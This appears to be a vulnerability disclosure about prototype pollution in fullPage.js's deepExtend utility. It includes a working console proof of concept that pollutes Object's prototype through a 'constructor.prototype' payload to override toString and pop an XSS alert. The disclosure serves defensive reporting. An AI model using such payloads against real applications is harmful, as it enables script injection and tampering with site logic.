Description

fullPage utils are available to developers using window.fp_utils. They can use these utils for their own use-case (other than fullPage) as well. However, one of the utils deepExtend is vulnerable to Prototype Pollution vulnerability.

Javascript is “prototype” language which means when a new “object” is created, it carries the predefined properties and methods of an “object” with itself like toString, constructor etc.
By using prototype-pollution vulnerability, an attacker can overwrite/create the property of that “object” type. If the victim developer has used that property anywhere in the code, then it will have severe effect on the application.

For e.g.:

var obj = {};
console.log(obj.A); // undefined
obj["__proto__"].A = 1;
console.log(obj.A);  // 1
var new_obj = {};
console.log(new_obj.A); // 1  -> exploit

Proof of Concept

STEP 1: Visit https://alvarotrigo.com/fullPage demo.

STEP 2: Run the following code in dev tools console

NOTE: I am asking to run this in console for PoC purpose only. The real-world exploitation scenario may vary.

var o = {};
o.toString();
var obj = window.fp_utils.deepExtend({},{"constructor": {"prototype": {"toString": () => {alert(`XSS via Prototype Pollution`)}}}});

STEP 3: Call toString prototype function

o.toString();

and you will see an alert pop-up showing XSS exploitation.

Impact

Prototype pollution can be used to create/overwrite predefined properties and methods of object type. It can lead to XSS, change code logic, DoS etc. based on the application code.